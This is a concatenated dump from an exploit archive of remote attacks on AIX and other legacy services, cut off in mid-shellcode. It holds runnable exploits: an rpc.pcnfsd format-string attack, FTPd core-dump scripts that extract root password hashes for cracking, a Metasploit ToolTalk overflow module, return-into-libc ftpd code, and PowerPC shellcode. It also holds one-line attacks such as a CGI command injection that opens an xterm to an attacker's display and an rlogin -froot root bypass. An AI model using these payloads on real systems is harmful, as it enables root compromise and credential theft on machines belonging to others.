if(!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t xdr_cm_send2(XDR *xdrs, struct cm_send2 *objp)
{
if(!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
if(!xdr_int(xdrs, &objp->i))
return (FALSE);
return (TRUE);
}
int
main(int argc, char *argv[])
{
long ret, offset;
int len, x, y, i;
char *hostname, *b;
CLIENT *cl;
struct cm_send send;
struct cm_send2 send2;
struct cm_reply reply;
struct timeval tm = { 10, 0 };
enum clnt_stat stat;
printf("-= rpc.pcnfsd remote format string exploit, tested against AIX 6.1.0 and lower =-\n");
printf("-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\n");
printf("-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\n\n");
if(argc < 2) {
printf("Usage: %s [hostname]\n", argv[0]);
exit(1);
}
hostname = argv[1];
send.s1 = "AAAA%n%n%n%n%n%n%n%n%n"; // Create the dir on /var/spool/pcnfs
send.s2 = "";
send2.s1 = "AAAA%n%n%n%n%n%n%n%n%n";// Call the dir to trigger fmt bug
send2.s2 = "";
printf("\nSending PCNFSD_PR_INIT to the server ... ");
if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
clnt_pcreateerror("\nerror");exit(-1);
}
stat=clnt_call(cl, PCNFSD_PR_INIT, xdr_cm_send, (caddr_t) &send,
xdr_cm_reply, (caddr_t) &reply, tm);
clnt_destroy(cl);
printf("done!\n");
printf("Sending PCNFSD_PR_START procedure ... ");
if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
clnt_pcreateerror("\nerror");exit(-1);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
stat=clnt_call(cl, PCNFSD_PR_START, xdr_cm_send2, (caddr_t) &send2,
xdr_cm_reply, (caddr_t) &reply, tm);
printf("done!\n");
clnt_destroy(cl);
}

96
exploits/aix/remote/14409.pl Executable file
View file

@ -0,0 +1,96 @@
### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010
use IO::Socket;
$|=1;
print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--\n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd\n";
print "BY KINGCOPE\n";
print "JULY 2010\n\n";
if ($#ARGV < 1) {
print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]\n";
print "SAMPLES:\n";
print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd\n";
print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25\n";
exit;
}
$trgt = $ARGV[0];
$sock = IO::Socket::INET->new(PeerAddr => $trgt,
PeerPort => '21',
Proto => 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if ($ARGV[2] eq "") {
$user = "ftp";
$pass = "c0deb4b3\@roothash.com";
} else {
$user = $ARGV[2];
$passwd = $ARGV[3];
}
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x\n";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***\n";
print "\t$x";
print $sock "USER root\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS sexy\r\n";
$x = <$sock>;
print "\t$x";
}
print "*AIX EXPLOIT* ACCESSING FOLDER***\n";
print $sock "USER $user\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS $passwd\r\n";
$x = <$sock>;
print "\t$x";
if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***\n";
print $sock "CWD pub\r\n";
$x = <$sock>;
print "\t$x";
}
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print "\t$x";
print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n";
print $sock "NLST ~" . "A" x 5000 . "\r\n";
$x = <$sock>;
while(<$sock>) {
print;
}
print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
## CHEERIO!

328
exploits/aix/remote/14456.c Normal file
View file

@ -0,0 +1,328 @@
/*
* IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
*
* Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
*
* bug found & exploited by Kingcope
*
* Version 2.0 - July 2010
* ----------------------------------------------------------------------------
* Description: -
* The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
* For example: NLST ~AAAAA...A (2000 A´s should be enough) -
* The fun part here is that it creates a coredump file in the current -
* directory if it is set writable by the logged in user. -
* The goal of the exploit is to get the DES encrypted user hashes -
* off the server. These can be later cracked with JtR. -
* This is accomplished by populating the memory with logins of the user -
* we would like the encrypted hash from. Logging in three times with the -
* target username should be enough so that the DES hash is included in the -
* 'core' file. -
* The FTPd banner looks like below. -
* 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready. -
* 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. -
* ----------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <fcntl.h>
int createconnection(char *target, char *targetport);
void getline(int s);
void putline(int s, char *out);
void usage(char *exe);
char in[8096];
char out[8096];
int main(int argc, char *argv[])
{
extern int optind;
extern char *optarg;
int haveuser=0,havepassword=0;
int s,s2,nsock;
int c,k,len;
int fd;
char *target = NULL;
char *username = "ftp";
char *password = "guest";
char *writeto = "pub";
char *crackme = "root";
char *targetport = "21";
int uselist = 0;
char *myip = NULL;
char *as = NULL;
int octet_in[4], port;
struct sockaddr_in yo, cli;
char *oct = NULL;
while ((c = getopt(argc, argv, "h:i:p:l:k:d:c:s")) != EOF) {
switch(c) {
case 'h':
target = (char*)malloc(strlen(optarg)+1);
strcpy(target, optarg);
break;
case 'i':
myip = (char*)malloc(strlen(optarg)+1);
strcpy(myip, optarg);
break;
case 'p':
targetport = (char*)malloc(strlen(optarg)+1);
strcpy(targetport, optarg);
break;
case 'l':
username = (char*)malloc(strlen(optarg)+1);
strcpy(username, optarg);
haveuser = 1;
break;
case 'k':
password = (char*)malloc(strlen(optarg)+1);
strcpy(password, optarg);
havepassword = 1;
break;
case 'd':
writeto = (char*)malloc(strlen(optarg)+1);
strcpy(writeto, optarg);
break;
case 'c':
crackme = (char*)malloc(strlen(optarg)+1);
strcpy(crackme, optarg);
break;
case 's':
uselist = 1;
break;
default:
usage(argv[0]);
}
}
if (target == NULL || myip == NULL)
usage(argv[0]);
if ((haveuser && !havepassword) || (!haveuser && havepassword)) {
usage(argv[0]);
}
s = createconnection(target, targetport);
getline(s);
fprintf(stderr, "populating DES hash in memory...\n");
for (k=0;k<3;k++) {
snprintf(out, sizeof out, "USER %s\r\n", crackme);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS abcdef\r\n");
putline(s,out);
getline(s);
}
fprintf(stderr, "logging in...\n");
snprintf(out, sizeof out, "USER %s\r\n", username);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS %s\r\n", password);
putline(s,out);
getline(s);
getline(s);
fprintf(stderr, "changing directory...\n");
snprintf(out, sizeof out, "CWD %s\r\n", writeto);
putline(s, out);
getline(s);
fprintf(stderr, "triggering segmentation violation...\n");
as = (char*)malloc(2000);
memset(as, 'A', 2000);
as[2000-1]=0;
if (!uselist) {
snprintf(out, sizeof out, "NLST ~%s\r\n", as);
} else {
/* AIX 5.3 trigger - thanks to karol */
snprintf(out, sizeof out, "LIST ~%s\r\n", as);
}
putline(s, out);
memset(in, '\0', sizeof in);
if (recv(s, in, sizeof in, 0) < 1) {
printf("trigger succeeded!\nwaiting for core file to be created...\n");
} else {
printf("trigger seems to have failed, proceeding anyways...\n"
"\nwaiting for core file to be created...\n");
}
sleep(5);
close(s);
s = createconnection(target, targetport);
getline(s);
fprintf(stderr, "logging in 2nd time...\n");
snprintf(out, sizeof out, "USER %s\r\n", username);
putline(s, out);
getline(s);
snprintf(out, sizeof out, "PASS %s\r\n", password);
putline(s,out);
getline(s);
getline(s);
fprintf(stderr, "changing directory...\n");
snprintf(out, sizeof out, "CWD %s\r\n", writeto);
putline(s, out);
getline(s);
fprintf(stderr, "getting core file...\n");
snprintf(out, sizeof out, "TYPE I\r\n");
putline(s, out);
getline(s);
port = getpid() + 1024;
len = sizeof(cli);
bzero(&yo, sizeof(yo));
yo.sin_family = AF_INET;
yo.sin_port=htons(port);
yo.sin_addr.s_addr = htonl(INADDR_ANY);
oct=(char *)strtok(myip,".");
octet_in[0]=atoi(oct);
oct=(char *)strtok(NULL,".");
octet_in[1]=atoi(oct);
oct=(char *)strtok(NULL,".");
octet_in[2]=atoi(oct);
oct=(char *)strtok(NULL,".");
octet_in[3]=atoi(oct);
snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
putline(s, out);
getline(s);
if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
return -1;
}
if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
perror("bind");
close(s2);
exit(1);
}
if (listen(s2, 10) < 0) {
perror("listen");
close(s2);
exit(1);
}
snprintf(out, sizeof out, "RETR core\r\n");
putline(s, out);
getline(s);
if (strstr(in, "150") == NULL) {
fprintf(stderr, "core file not found... terminating.\n");
close(s);
exit(1);
}
fd = open("core", O_WRONLY | O_CREAT);
if (fd == -1) {
perror("open on local core file");
close(s);
exit(1);
}
sleep(1);
if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
perror("accept");
close(s);
exit(1);
}
do {
k = recv(nsock, in, sizeof in, 0);
if (k < 1) break;
write(fd, in, k);
} while (k > 0);
close(nsock);
close(fd);
close(s);
fprintf(stderr, "finally extracting DES hashes from core file for user '%s'...\n", crackme);
system("strings core | grep '^[A-Za-z0-9]\\{13\\}$'");
fprintf(stderr, "done.\n");
return 0;
}
int createconnection(char *target, char *targetport) {
struct addrinfo hints, *res;
int s;
memset(&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if (getaddrinfo(target, targetport, &hints, &res)) {
perror("getaddrinfo");
exit(1);
}
s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
if (s < 0) {
perror("socket");
exit(1);
}
if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
perror("connect");
exit(1);
}
return s;
}
void getline(int s)
{
memset(in, '\0', sizeof in);
if (recv(s, in, sizeof in, 0) < 1) {
perror("recv");
close(s);
exit(1);
}
fprintf(stderr, "<\t%s", in);
}
void putline(int s, char *out) {
fprintf(stderr, ">\t%s", out);
if (send(s, out, strlen(out), 0) == -1) {
perror("send");
close(s);
exit(1);
}
}
void usage(char *exe)
{
fprintf(stderr, "%s <-h host> <-i your internal ip> [-p port] [-l username] [-k password]"
" [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n",
exe);
exit(0);
}

289
exploits/aix/remote/16930.rb Executable file
View file

@ -0,0 +1,289 @@
##
# $Id: rpc_ttdbserverd_realpath.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SunRPC
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',
'Description' => %q{
This module exploits a buffer overflow vulnerability in _tt_internal_realpath
function of the ToolTalk database server (rpc.ttdbserverd).
},
'Author' =>
[
'Adriano Lima <adriano@risesecurity.org>',
'ramon'
],
'Version' => '$Revision: 10998 $',
'Platform' => [ 'aix' ],
'References' =>
[
[ 'CVE', '2009-2727'],
[ 'OSVDB', '55151' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[
'IBM AIX Version 6.1.4',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099430+4096,
'Addr1' => 0x2ff1ff50-8192,
'AIX' => '6.1.4',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099430-8192 },
'Stop' => { 'Ret' => 0x20099430+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.3',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.2',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.2',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.1',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.0',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.0',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
'Stop' => { 'Ret' => 0x20096ba0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096bf0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.10',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096bf0-8192 },
'Stop' => { 'Ret' => 0x20096bf0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.9',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
'Stop' => { 'Ret' => 0x20096ba0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.8',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.8',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
'Stop' => { 'Ret' => 0x20096c10+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.7',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
'Stop' => { 'Ret' => 0x20096c10+8192 },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 6.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '6.1.4',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 5.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '5.3.10',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 17 2009'))
end
def brute_exploit(brute_target)
if not @aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
begin
sunrpc_create('tcp', 100083, 1)
if target['AIX'] =~ /6\./
buf = "A"
else
buf = "AA"
end
buf << [target['Addr1']].pack('N') * (1022 + 8)
buf << [brute_target['Ret']].pack('N') * 32
if target['AIX'] =~ /6\./
buf << "AAA"
else
buf << "AA"
end
buf << "\x7f\xff\xfb\x78" * 1920
buf << @aixpayload
buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
print_status('Sending procedure 15 call message...')
sunrpc_call(15, buf)
sunrpc_destroy
handler
rescue Rex::Proto::SunRPC::RPCTimeout
# print_error('RPCTimeout')
rescue EOFError
# print_error('EOFError')
end
end
end

16
exploits/aix/remote/19047.txt Normal file
View file

@ -0,0 +1,16 @@
source: https://www.securityfocus.com/bid/62/info
There exists a buffer overflow in the Stalker Internet Mail Server version 1.6. If you connect to the SMTP port and issue a HELO command with a large string (several hundred bytes) for a hostname the server, and possibly MacOS, will crash.
220-Stalker Internet Mail Server V.1.6 is ready.
220 ESMTP is spoken here.
HELO
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxx
[dead]

5
exploits/aix/remote/19048.txt Normal file
View file

@ -0,0 +1,5 @@
source: https://www.securityfocus.com/bid/64/info
There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.
$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'

7
exploits/aix/remote/19237.txt Normal file
View file

@ -0,0 +1,7 @@
source: https://www.securityfocus.com/bid/297/info
NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data will allow an unathorized user to relay email via this server.
Gordano's own JUCE product (to prevent mail relay attacks and other SPAM activity) will not prevent NTMAIL v.3.x from being used as a mail relay.
Specify <> in the 'Mail From' field.

5
exploits/aix/remote/19348.txt Normal file
View file

@ -0,0 +1,5 @@
source: https://www.securityfocus.com/bid/458/info
A problem with the way login parses arguments as passed by rlogind that may allow access to the root account.
%rlogin -froot targethost.com

159
exploits/aix/remote/19532.pl Executable file
View file

@ -0,0 +1,159 @@
source: https://www.securityfocus.com/bid/679/info
A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access.
#!/usr/bin/perl
# *** Synnergy Networks
# * Description:
#
# Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an
# RS6000. (power)
# This is an return into libc exploit specificly crafted for
# one box and it is very unlikely to work on another box
# * Author:
#
# dvorak (dvorak@synnergy.net)
# Synnergy Networks (c) 1999, http://www.synnergy.net
# * Greets:
#
# Synnergy Networks, Hit2000 crew, Emphyrio, shevek
# * Comments:
#
# A full working exploit will be released later on.
# The addresses point to positions in the program or libraries,
# only the relevant instructions are shown also note that b r0
# is in fact something like mfsbr r0, bsbr or what that is in
# RS6000 assembly.
#
# The final call is to system which needs the following arguments:
# r3 = address of command to execute
# r2 = TOC (what is TOC anyway), I don't know if it does matter but
# we set it anyway (we can so why not do it)
# r1 = SP but this is ok already,
# the rest is free so it seems.
#
# Our route:
# 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228
# 0x10015228: loads r12 with a value from our buffera
# loads r0 with the next address to jump to (0x1001038c)
# and sets r2 to another place in our buffer
# 0x1001038c: sets r3 to a place in the buffer (finally!)
# sets r0 to next address to jump to (0xd00406d4, system(...))
#
# The flow with registers is thus:
# r2 = 0x14(r1)
# r12 = 0x110(r2)
# r0 = 0x0(r12)
# r2 = 0x4(r12)
# r3 = 0x40(r1)
# r12 = 0x3c(r2)
# 0x14(r1) = r12 this is the plave where TOC is stored but it doesn't seem
# to matter
# r0 = 0x0(12)
# r2 = 0x04(r12)
# and of we go...
#
# We set:
# $buf = the buffer on the stack $buf[0] is the first byte in the buffer
# but we will count offsets from 4 (the first 4 bytes is just "CEL " is
# doesn't matter, only the space does (it makes sure the rest of the buffer)
# stays the way it is and isn't converted into lower case
#
# Offsets:
# 0x000: 0x1001038c
# 0x004: buf[0]
# 0x008: this is the place where the address of the systemcall is taken from
# 0xd00406d4 in our case# 0x00c: thi is the address where r2 is
loaded
# from just before the call to
# system(..) we set it to the TOC in our program we don't know if it
# matters and if the TOC is constant between hosts
# 0x03c: buf[08]
# 0x110: buf[0]
# 0x204: return address (0x10010150)
# 0x210: buf[0]
# 0x23c: buf[0x240]
# 0x240: "/tmp/sh" or whatever command you want to execute
# r1 points to buf[0x1fc]
#
# I assume the positions in the libraries/program are fixed and that TOC
# either doesn't matter or is fixed to please enlighten me on these topics.
#
# 0x10010150:
# l r2, 0x14(r1)
# b 0x10015228
# 0x10015228:
# l r12, 0x110(r2)
# st r12, 0x14(r1)
# l r0, 0x0(r12)
# l r2, 0x4(r12)
# b r0
# 0x1001038c:
# l r3, 0x40(r1)
# b 0x100136f8
# 0x100136f8:
# l r12, 0x3c(r2)
# st r12, 0x14(r1)
# l r0, 0x0(r12)
# l r2, 0x04(r12)
# *** Synnergy Networks
$bufstart = 0x2ff22724; # this is our first guess
$nop = "\xde\xad\xca\xfe";
$buf = "CEL ";
$buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of
# 'borrowed' code
$buf .= pack ("N", $bufstart); # 4
$buf .= "\xd0\x04\x06\xd4"; # 8 system call..
$buf .= "\xf0\x14\x63\x5c"; # c TOC
$offset = 0x10;
while ($offset < 0x3c) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x008);
$offset += 4;
while ($offset < 0x110) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x204) {
$offset += 4;
$buf .= $nop;
}
$buf .= "\x10\x01\x01\x50";
$offset += 4;
while ($offset < 0x210) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x23c) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x240);
$offset += 4;
while ($offset < 0x240) {
$offset += 4;
$buf .= $nop;
}
# this is the command that will be run through system
$buf .= "/tmp/sh";
$buf .= "\n";
# offcourse you should change this .
# open F, "| nc -v -v -n 192.168.2.12 21";
open F, "| od -tx1";
printf F $buf;
close F;
# EOF

194
exploits/aix/remote/21093.c Normal file
View file

@ -0,0 +1,194 @@
// source: https://www.securityfocus.com/bid/3237/info
The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges on vulnerable systems.
/*## copyright LAST STAGE OF DELIRIUM oct 1999 poland *://lsd-pl.net/ #*/
/*## pdnsd #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of some OS fingerprinting method */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 4000
#define NOPNUM 4800
#define ALLIGN 1
#define SCAIX41 "\x03\x68\x41\x5e\x6d\x7f\x6f\xd6\x57\x56\x55\x53"
#define SCAIX42 "\x02\x71\x46\x62\x76\x8e\x78\xe7\x5b\x5a\x59\x58"
char syscallcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <syscallcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xc0\x01\xff" /* lil r22,0x1ff */
"\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */
"\x7e\xb5\xba\x14" /* cax r21,r21,r23 */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca 0x0 */
"\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */
;
char findsckcode[]=
"\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */
"\x41\x82\xff\xfd" /* beql <findsckcode> */
"\x7f\x08\x02\xa6" /* mflr r24 */
"\x3b\x36\xfe\x2d" /* cal r25,-467(r22) */
"\x3b\x40\x01\x01" /* lil r26,0x16 */
"\x7f\x78\xca\x14" /* cax r27,r24,r25 */
"\x7f\x69\x03\xa6" /* mtctr r27 */
"\x4e\x80\x04\x20" /* bctr */
"\xa3\x78\xff\xfe" /* lhz r27,-2(r24) */
"\xa3\x98\xff\xfa" /* lhz r28,-6(r24) */
"\x7c\x1b\xe0\x40" /* cmpl cr0,r27,r28 */
"\x3b\x36\xfe\x59" /* cal r25,-423(r22) */
"\x41\x82\xff\xe4" /* beq <findsckcode+20> */
"\x7f\x43\xd3\x78" /* mr r3,r26 */
"\x38\x98\xff\xfc" /* cal r4,-4(r24) */
"\x38\xb8\xff\xf4" /* cal r5,-12(r24) */
"\x93\x38\xff\xf4" /* st r25,-12(r24) */
"\x88\x55\xff\xf6" /* lbz r2,-10(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x5a\xff\xff" /* ai. r26,r26,-1 */
"\x2d\x03\xff\xff" /* cmpi cr2,r3,-1 */
"\x40\x8a\xff\xc8" /* bne cr2,<findsckcode+32> */
"\x40\x82\xff\xd8" /* bne <findsckcode+48> */
"\x3b\x36\xfe\x03" /* cal r25,-509(r22) */
"\x3b\x76\xfe\x02" /* cal r27,-510(r22) */
"\x7f\x23\xcb\x78" /* mr r3,r25 */
"\x88\x55\xff\xf7" /* lbz r2,-9(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x7a\xda\x14" /* cax r3,r26,r27 */
"\x7e\x84\xa3\x78" /* mr r4,r20 */
"\x7f\x25\xcb\x78" /* mr r5,r25 */
"\x88\x55\xff\xfb" /* lbz r2,-5(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x39\xff\xff" /* ai. r25,r25,-1 */
"\x40\x80\xff\xd4" /* bge <findsckcode+100> */
;
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
